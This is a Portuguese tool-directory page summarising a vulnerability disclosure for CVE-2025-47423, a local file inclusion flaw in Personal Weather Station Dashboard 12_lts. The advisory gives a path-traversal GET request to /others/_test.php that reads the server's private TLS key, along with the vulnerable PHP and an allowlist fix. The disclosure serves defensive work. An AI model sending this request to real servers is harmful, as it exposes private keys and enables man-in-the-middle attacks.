Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/haluka92/cve-2025-47423
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPapers e PesquisaAprendizado e EducaçãoRecursos Curados
GitHubhaluka92/cve-2025-47423

CVE-2025-47423

Divulgação detalhada da CVE-2025-47423: Inclusão de Arquivo Local no Personal Weather Station Dashboard 12_lts. Inclui PoC, análise de código vulnerável e recomendações de correção segura para aprendizado defensivo.

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-47423 – Inclusão de Arquivo Local no Personal Weather Station Dashboard (12_lts)

Descoberto por: Matthew Eagle
Status: Divulgação Pública
Data do Relato: 2025-05-05
ID CVE: CVE-2025-47423


🧩 Resumo

Uma vulnerabilidade de Inclusão de Arquivo Local (LFI) no Personal Weather Station Dashboard versão 12_lts permite que atacantes remotos não autenticados leiam arquivos arbitrários no servidor. Explorar esta falha concede acesso a arquivos sensíveis, incluindo chaves SSL privadas, comprometendo potencialmente a confidencialidade e integridade das conexões HTTPS.


🛠 Componente Afetado

  • Arquivo: /others/_test.php
  • Parâmetro Vulnerável: test (via GET)

📈 Impacto

Esta falha permite que atacantes remotos:

  • Leiam arquivos arbitrários no sistema de arquivos
  • Exponham chaves SSL privadas (ex.: server.key)
  • Realizem ataques man-in-the-middle (MITM)
  • Falsifiquem o servidor HTTPS

CVSS: 5.8 Médio


💥 Prova de Conceito (PoC)

root@kitploit:~
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com

Resposta:

root@kitploit:~
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----

🧪 Código Vulnerável (Simplificado)

root@kitploit:~
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);

A função str_replace é insuficiente para prevenir travessia de diretório.


🔐 Correção Segura

  • Use uma lista de permissões rigorosa para alvos de inclusão
  • Sanitize a entrada com basename() e verifique contra arquivos permitidos
  • Evite inclusão dinâmica baseada em entrada do usuário
root@kitploit:~
$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';

if (!in_array($script, $allowed_tests)) {
    die("Arquivo de teste inválido.");
}

include(__DIR__ . '/scripts/' . $script);

📅 Cronograma

DataEvento
2025-05-05Vulnerabilidade reportada aos moderadores do PWS Dashboard
2025-05-06Reconhecimento e testes observados
2025-05-07CVE-2025-47423 reservado via MITRE
TBDCorreção pública e listagem CVE pendente

🧠 Mitigação

Se você está executando Personal Weather Station Dashboard 12_lts, você deve:

  • Remover ou atualizar imediatamente o _test.php
  • Implementar o script corrigido com lista de permissões de arquivos
  • Rotacionar e reemitir quaisquer certificados TLS comprometidos

🧾 Referências

  • CVE-2025-47423 no MITRE (pendente)
  • Aviso publicado no GitHub

🙏 Crédito

Vulnerabilidade descoberta e divulgada de forma responsável por Matthew Eagle
Contato: [email protected]


Divulgação coordenada em respeito às diretrizes de divulgação responsável. Este documento é divulgado para fins educacionais e defensivos.

Baixar ferramenta